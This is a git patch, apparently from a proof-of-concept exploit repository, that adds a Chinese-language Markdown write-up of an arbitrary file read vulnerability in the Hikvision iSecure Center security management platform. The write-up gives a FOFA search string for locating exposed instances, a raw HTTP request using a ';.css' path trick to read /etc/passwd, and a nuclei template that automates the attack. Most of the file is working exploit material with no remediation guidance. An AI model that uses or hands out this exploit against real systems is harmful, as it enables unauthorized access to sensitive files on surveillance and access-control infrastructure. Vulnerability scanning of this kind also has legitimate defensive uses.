From f32276142970f7640ecddcef9ea9b41e4db30719 Mon Sep 17 00:00:00 2001 From: wy876 <139549762+wy876@users.noreply.github.com> Date: Sat, 30 Dec 2023 20:03:33 +0800 Subject: [PATCH] =?UTF-8?q?Create=20=E6=B5=B7=E5=BA=B7=E5=A8=81=E8=A7=86-?= =?UTF-8?q?=E7=BB=BC=E5=90=88=E5=AE=89=E9=98=B2=E7=AE=A1=E7=90=86=E5=B9=B3?= =?UTF-8?q?=E5=8F=B0-files-=E6=96=87=E4=BB=B6=E8=AF=BB=E5=8F=96.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- 海康威视-综合安防管理平台-files-文件读取.md | 57 +++++++++++++++++++++ 1 file changed, 57 insertions(+) create mode 100644 海康威视-综合安防管理平台-files-文件读取.md diff --git a/海康威视-综合安防管理平台-files-文件读取.md b/海康威视-综合安防管理平台-files-文件读取.md new file mode 100644 index 0000000..06d230c --- /dev/null +++ b/海康威视-综合安防管理平台-files-文件读取.md @@ -0,0 +1,57 @@ +## 海康威视-综合安防管理平台-files-文件读取 + +HIKVISION iSecure Center综合安防管理平台是一套“集成化”、“智能化”的平台,通过接入视频监控、一卡通、停车场、报警检测等系统的设备。在其某接口处存在任意文件读取漏洞,攻击者可以读取系统任意敏感文件。 + +![4c21a71d9bf1158fb01d135407cc7937](https://github.com/wy876/POC/assets/139549762/4138463c-5aa9-4443-97b0-a021bfd9876a) + +## fofa +``` +综合安防管理平台 +``` + +## poc +``` +GET /lm/api/files;.css?link=/etc/passwd HTTP/1.1 +Host: +Connection: keep-alive +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Sec-Fetch-Site: none +Sec-Fetch-Mode: navigate +Sec-Fetch-User: ?1 +Sec-Fetch-Dest: document +sec-ch-ua: "Google Chrome";v="117", "Chromium";v="117", "Not=A?Brand";v="24" +sec-ch-ua-mobile: ?0 +sec-ch-ua-platform: "Windows" +Accept-Encoding: gzip, deflate, br +Accept-Language: zh-CN,zh;q=0.9 +``` + +## nuclei poc +``` +id: hikvision-files-fileread + +info: + name: 海康威视-综合安防管理平台-files-文件读取 + author: hikvision-files-fileread + severity: high + +requests: + - raw: + - | + GET /lm/api/files;.css?link=/etc/passwd HTTP/1.1 + Host: {{Hostname}} + Connection: close + Cache-Control: max-age=0 + Upgrade-Insecure-Requests: 1 + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 + + matchers: + - type: dsl + dsl: + - contains_all(all_headers,'attachment','fileName') + +``` +![](./assets/20231230200200.png)